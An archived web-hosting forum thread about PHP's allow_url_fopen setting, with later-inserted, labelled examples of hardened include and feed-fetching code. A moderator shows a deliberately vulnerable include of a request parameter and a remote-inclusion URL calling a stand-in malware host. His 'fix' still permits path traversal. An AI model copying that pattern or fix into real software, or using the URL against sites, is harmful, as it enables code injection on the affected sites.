"allow_url_fopen"

The "Freeola Customer Forum" forum, which includes Retro Game Reviews, has been archived and is now read-only. You cannot post here or create a new thread or review on this forum.

Wed 15/07/09 at 15:31
Regular
Posts: 595
I have read in various articles that, when enabled, this poses code injection security risks.

Is it possible to disable this on my webspace (I see it is currently 'on')?

Neil
Tue 21/07/09 at 20:17
Regular
Posts: 595
Many thanks for your quick response.

N.
Tue 21/07/09 at 20:01
Staff Moderator
"Aargh! Broken..."
Posts: 1,408
As other users of our VIP service use this functionality (for things such as pulling in RSS feeds among other uses) we are unable to disable this functionality.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:

On a page somewhere:


<?php
// ... rest of the page ...
// The request parameter is passed straight to include(): with allow_url_fopen
// on, a remote URL in ?page= is fetched and executed as PHP.
include($_GET['page']);
// ...
?>


This allows someone to include other remote content by doing something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject

A simple fix would be to move your content pages to their own folder and then modify the code to this:


<?php
// ... rest of the page ...
// Prefixing a local directory means the parameter can no longer name a remote
// URL, so include() only ever looks inside page_dir/.
include('page_dir/'.$_GET['page']);
// ...
?>


Try the .htaccess rules you asked support about and that may clear up your problems, although we can't really help if the rewrite rules cause problems.
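An added example (not the moderator's code, and not code from this forum) of the same include-by-parameter page written so that the value of allow_url_fopen stops mattering: the request parameter is matched against a fixed list of page names, and the resolved file is then checked to still sit inside the content directory, so neither a remote URL nor a "../" value ever reaches include(). The directory name page_dir and the page names are assumptions for the example.

```php
<?php
// Added example, not the forum poster's code. Hardened version of the
// include-by-request-parameter pattern: allowlist the page name, then verify
// the resolved path is contained in the content directory before including it.
// PAGE_DIR and ALLOWED_PAGES are assumptions for the example.

declare(strict_types=1);

const PAGE_DIR      = __DIR__ . '/page_dir';           // assumed content directory
const ALLOWED_PAGES = ['home', 'about', 'contact'];     // assumed page names

/**
 * Map a user-supplied page name to a file path, or return null if the name is
 * not on the allowlist or the resolved file escapes PAGE_DIR.
 */
function resolve_page(string $requested): ?string
{
    // Allowlist check: only known names, nothing built from raw input.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    $candidate = PAGE_DIR . '/' . $requested . '.php';

    // realpath() resolves symlinks and ".." segments; false means "no such file".
    $real = realpath($candidate);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false) {
        return null;
    }

    // Containment check: the resolved file must live under the content directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $real;
}

$requested = (string) ($_GET['page'] ?? 'home');
$path = resolve_page($requested);

if ($path === null) {
    // Log the rejected value (non-printable bytes replaced, length capped) so
    // probing shows up in the logs, but never echo it back to the client.
    $logged = substr(preg_replace('/[^\x20-\x7e]/', '?', $requested), 0, 100);
    error_log('Rejected page parameter: ' . $logged);
    http_response_code(404);
    echo 'Page not found.';
    exit;
}

include $path;
```

The point of the allowlist is that the parameter is only ever compared, never concatenated; the realpath() containment check is a second line of defence in case the list is later replaced by something looser.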
Tue 21/07/09 at 19:27
Regular
Posts: 595
@ Eccles

Any progress on disabling this yet?

N.
Thu 16/07/09 at 13:56
Regular
Posts: 595
Agreed.

I do hope you can invoke some kind of disabling of this. I believe it would greatly help.

I look forward to hearing any progress.

N.
Thu 16/07/09 at 13:51
Staff
Posts: 120
Neilj99 wrote:
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.

We don't allow customers to override PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overridden on the same basis as the enable global vars option (another option which can allow security risks).
Wed 15/07/09 at 22:03
Regular
Posts: 595
Many thanks.

...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?

N.
Wed 15/07/09 at 21:47
Staff Moderator
"Aargh! Broken..."
Posts: 1,408
I will see whether we can have this feature disabled. It might inconvenience some customers who use it but they should be able to use cURL instead to achieve the same thing.

If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problems and that is why it's generally considered a good idea to disable it.
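An added example (not the moderator's code, and not code from this forum) of the two points in this post, pulling in an RSS feed with cURL rather than a URL-aware file_get_contents(), and checking what comes back before it is used: the feed host is compared against an allowlist, only https is permitted, redirects are refused, timeouts and a size cap are enforced, the XML is parsed with network access disabled, and every value is escaped on output. The feed host names and URL are assumptions for the example.

```php
<?php
// Added example, not the forum poster's code. Fetch an RSS feed with cURL and
// treat the response as untrusted input. ALLOWED_FEED_HOSTS, MAX_FEED_BYTES and
// the feed URL at the bottom are assumptions for the example.

declare(strict_types=1);

const ALLOWED_FEED_HOSTS = ['example.com', 'feeds.example.org']; // assumed
const MAX_FEED_BYTES     = 1000000;                              // assumed cap

function fetch_feed(string $url): ?SimpleXMLElement
{
    // Validate the URL before a single byte is sent.
    $parts = parse_url($url);
    if ($parts === false
        || ($parts['scheme'] ?? '') !== 'https'
        || !in_array(strtolower($parts['host'] ?? ''), ALLOWED_FEED_HOSTS, true)) {
        return null;
    }

    $body = '';
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_FOLLOWLOCATION => false,            // a redirect elsewhere is a failure, not a hop
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS,  // never fall back to http, ftp, file, ...
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
        // Accumulate the body ourselves; returning fewer bytes than received
        // makes cURL abort the transfer, which is how the size cap is enforced.
        CURLOPT_WRITEFUNCTION  => function ($ch, string $chunk) use (&$body): int {
            $body .= $chunk;
            return strlen($body) > MAX_FEED_BYTES ? 0 : strlen($chunk);
        },
    ]);
    $ok     = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);

    if ($ok === false || $status !== 200 || strlen($body) > MAX_FEED_BYTES) {
        return null;
    }

    // Parse with network access off (LIBXML_NONET) and without entity
    // substitution (no LIBXML_NOENT), so the document cannot pull in more data.
    $previous = libxml_use_internal_errors(true);
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    return $xml === false ? null : $xml;
}

/** Escape a feed value for HTML output; markup in the feed becomes literal text. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$feed = fetch_feed('https://example.com/feed.xml'); // assumed feed URL

if ($feed === null) {
    echo '<p>Feed unavailable.</p>';
} else {
    echo '<ul>';
    foreach ($feed->channel->item as $item) {
        // Only accept http(s) links; anything else is dropped rather than rendered.
        $link   = (string) $item->link;
        $scheme = strtolower((string) parse_url($link, PHP_URL_SCHEME));
        if ($scheme !== 'https' && $scheme !== 'http') {
            continue;
        }
        echo '<li><a href="' . h($link) . '">' . h((string) $item->title) . '</a></li>';
    }
    echo '</ul>';
}
```

Escaping on output is what stops markup carried in a feed (an injected iframe, say) from being rendered as HTML on the site that embeds it, which is the "check any data it brings in" step the post describes.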
Wed 15/07/09 at 21:36
Regular
Posts: 595
With respect to your knowledge, I'm not entirely convinced.

I direct you to this article

http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/

I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.

I believe if allow_url_fopen was disabled it would help me immensely.

I have read that I can include

allow_url_fopen=off

in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.

N.
Wed 15/07/09 at 16:42
Regular
"Embrace the Martian"
Posts: 285
Chill Winstaaaan :D It is not that much of an issue to you, it is actually a security feature for server owners to protect themselves against users, such as you using fopen to grab external web pages and using them for malicious purposes. Just do not use fopen to reference external URLs and you will be doing the same as having allow_url_fopen turned off.